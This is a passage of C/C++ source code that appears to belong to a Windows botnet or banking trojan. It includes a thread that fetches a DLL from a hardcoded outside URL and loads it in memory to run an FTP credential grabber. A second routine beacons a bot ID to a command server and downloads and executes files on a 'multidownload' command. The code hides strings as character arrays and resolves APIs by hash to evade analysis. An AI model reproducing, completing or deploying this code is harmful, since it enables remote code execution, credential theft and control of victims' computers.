m_lstrcat(query," HTTP/1.1\r\nAccept: */* \r\n ");
m_lstrcat(query,"Accept-Language: ru \r\n");
m_lstrcat(query,"UA-CPU: x86 \r\n");
m_lstrcat(query,"Accept-Encoding: gzip, deflate \r\n");
m_lstrcat(query,"User-Agent: ");
m_lstrcat(query,UserAgent);
m_lstrcat(query,"\r\nHost: ");
m_lstrcat(query,Host);
m_lstrcat(query,"\r\nConnection: Close\r\n\r\n\r\n");
bool b = MySend( Socket, (const char *)query, m_lstrlen( query ) );
MemFree( Host );
//MemFree( Path );
MemFree( UserAgent );
MemFree( query );
if ( !b )
{
return false;
}
DWORD dwSizeFile = 0;
char *Buffer = RecvAndParse( Socket, &dwSizeFile );
if ( !Buffer )
{
pclosesocket( Socket );
return false;
}
if ( dwSize )
{
*lpBuffer = (LPBYTE)Buffer;
*dwSize = dwSizeFile;
return true;
}
return false;
}
DWORD WINAPI GrabberThread( LPVOID lpData )
{
UnhookDlls();
/*
char GrabberFile[] = {'X',':','\\', 't','r','a','s','h','\\','c','o','d','e','\\','w','o','r','k','\\' ,'r','f','b','\\','b','r','a','n','c','h','e','s','\\','d','l','l','\\','b','i','n','\\','D','e','b','u','g','\\','x','8','6','.','d','l','l',0};
///if ( BotModule != NULL )
{
typedef void ( WINAPI *PVNC_Start )();
HANDLE hFile=CreateFile(GrabberFile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
DWORD dwSize=GetFileSize(hFile,0);
LPVOID BotModule = MemAlloc(dwSize);
pReadFile(hFile,BotModule,dwSize,&dwSize,0);
pCloseHandle(hFile);
HMEMORYMODULE hLib = MemoryLoadLibrary( BotModule );
if ( hLib == NULL )
{
return 0;
}
PVNC_Start VNC_Start = (PVNC_Start)MemoryGetProcAddress( hLib, "_VNC_Start@0" );
///PVNC_Start VNC_Start = (PVNC_Start)GetProcAddress(LoadLibrary(GrabberFile),"_VNC_Start@0");
VNC_Start();
while (true) pSleep(1);
MemoryFreeLibrary( hLib );
MemFree( BotModule );
return 1;
}
*/
//link.txt
//
char GrabberFile[] = {"http://apartman-adriana.com/temp/DrClient.dll"/*'/','g','r','a','b','e','r','.','d','l','l',0*/};
LPVOID BotModule = NULL;
bool bKnock = false;
while ( ( BotModule = DownloadPluginFromPath(GrabberFile, NULL ) ) == NULL )
{
pSleep( 1000 * 60 * 5 );
}
if ( BotModule != NULL )
{
HMEMORYMODULE hLib = MemoryLoadLibrary( BotModule );
if ( hLib == NULL )
{
return 0;
}
typedef char * ( WINAPI *PFTPGRAB )();
char GrabFTP[] = {'S','c','a','n','1', 0 };
char Ole32[] = {'o','l','e','3','2','.','d','l','l', 0};
typedef void ( WINAPI *PCoUninitialize )();
typedef HRESULT ( WINAPI *PCoInitialize )( LPVOID lpReserved );
PCoUninitialize pCoUninitialize_ = (PCoUninitialize)GetProcAddressEx( Ole32, 0, 0xEDB3159D );
PCoInitialize pCoInitialize_ = (PCoInitialize)GetProcAddressEx( Ole32, 0, 0xF341D5CF );
pCoUninitialize_();
pCoInitialize_( NULL );
PFTPGRAB FtpGrabber = (PFTPGRAB)MemoryGetProcAddress( hLib, GrabFTP );
char *Buffer = FtpGrabber();
DWORD dwSize = m_lstrlen( Buffer );
if ( dwSize != 0 )
{
Buffer[ dwSize ] = '\0';
bool Sended = false;
do
{
// Отправляем данные на сервер
Sended = true;
if (!Sended)
pSleep( 1000 );
}
while (!Sended);
}
MemoryFreeLibrary( hLib );
MemFree( Buffer );
MemFree( BotModule );
}
bool ReportToPlugin( char *Url )
{
WSADATA wsa;
if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
{
return false;
}
char *Host = NULL;
char *Path = NULL;
int Port = 0;
if ( !ParseUrl1( Url, &Host, &Path, &Port ) )
{
return false;
}
char Uid[100];
GenerateUid( Uid );
typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
fwsprintfA pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
char *UserAgent = NULL;
UserAgent = (char*)MemAlloc( 1024 );
DWORD dwUserSize = 1024;
pObtainUserAgentString( 0, UserAgent, &dwUserSize );
if ( UserAgent == NULL )
{
MemFree( UserAgent );
UserAgent = "-";
}
char Request[] = "POST %s HTTP/1.0\r\n"
"Host: %s\r\n"
"User-Agent: %s\r\n"
"Accept: text/html\r\n"
"Connection: Close\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: %d\r\n\r\n";
char Args[] = "id=";
char *HttpPacket = NULL;
HttpPacket = (char*)MemAlloc( 2048 );
int iTmp;
if (LoadExe!=NULL)
{
iTmp=m_lstrlen(LoadExe);
}else iTmp=9;
pwsprintfA( HttpPacket, Request, Path, Host, UserAgent, m_lstrlen( Args ) + m_lstrlen( Uid )+iTmp );
m_lstrcat( HttpPacket, Args );
m_lstrcat( HttpPacket, Uid );
if (LoadExe==NULL)
{
LoadExe = (char*)MemAlloc(10);
m_lstrncpy(LoadExe,"&plugins=",9);
LoadExe[9]='\0';
}
m_lstrcat( HttpPacket, LoadExe );
SOCKET Socket = MyConnect1( Host, Port );
if( Socket == -1 )
{
return false;
}
bool b = MySend( Socket, (const char *)HttpPacket, m_lstrlen( HttpPacket ) );
MemFree( HttpPacket );
if ( !b )
{
return false;
}
DWORD dwSize = 0;
char *Buffer = RecvAndParse( Socket, &dwSize );
if ( !Buffer )
{
pclosesocket( Socket );
return false;
}
char MultiDownloadCommand[]={'m','u','l','t','i','d','o','w','n','l','o','a','d',0};
char *Context;
m_strtok_s( Buffer, "\r\n", &Context );
if ( !m_lstrncmp( Buffer, MultiDownloadCommand, m_lstrlen( MultiDownloadCommand ) ) )
{
char * cPointer= m_strstr(&Buffer[1],"http:");
char* cUrl=Buffer;
char* cUrlNext;
int i;
char *DownloadUrl;
while (true)
{
cUrl= m_strstr(&cUrl[1],"http:");
if (cUrl==NULL)break;
cUrlNext= m_strstr(cUrl,"|");
i=m_lstrlen(cUrl)-m_lstrlen(cUrlNext);
DownloadUrl = (char*)MemAlloc(i)+1;
m_lstrncpy(DownloadUrl,cUrl,i);
DownloadUrl[i]='\0';
if ( DownloadUrl )
{
LoadExe=(char*)MemRealloc(LoadExe,33+m_lstrlen(LoadExe)+1);
m_lstrcat( LoadExe, MD5StrFromBuf(DownloadUrl, STRA::Length(DownloadUrl)).t_str());
m_lstrcat( LoadExe, "|");
WCHAR *FileName =(WCHAR *)GetTempName();
if ( FileName && DownloadUrl )
{
ExecuteFile( DownloadUrl, FileName );
}
MemFree( FileName );
}
MemFree( DownloadUrl );
}
}
MemFree( Buffer );
pclosesocket( Socket );
return true;
}
char *GetInfoFromBcServer( char *Url )
{
WSADATA wsa;
if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
{
return false;
}
char *Host = NULL;
char *Path = NULL;
int Port = 0;
if ( !ParseUrl( Url, &Host, &Path, &Port ) )
{
return false;
}
typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
fwsprintfA _pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
char Request[] = "GET %s HTTP/1.0\r\n"
"Host: %s\r\n"
"User-Agent: %s\r\n"
"Connection: close\r\n\r\n";
char *HttpPacket = (char*)MemAlloc( 1024 );
if ( HttpPacket == NULL )
{
return false;
}
char *UserAgent = (char*)MemAlloc( 1024 );
DWORD dwUserSize = 1024;
pObtainUserAgentString( 0, UserAgent, &dwUserSize );
_pwsprintfA( HttpPacket, Request, Path, Host, UserAgent );
SOCKET Socket = MyConnect( Host, Port );
if ( Socket == INVALID_SOCKET )
{
MemFree( HttpPacket );
return NULL;
}
bool b = MySend( Socket, (const char *)HttpPacket, m_lstrlen( HttpPacket ) );
MemFree( HttpPacket );
if ( !b )
{
return NULL;
}
DWORD dwSize = 0;
char *Buffer = RecvAndParse( Socket, &dwSize );
pclosesocket( Socket );
return Buffer;
}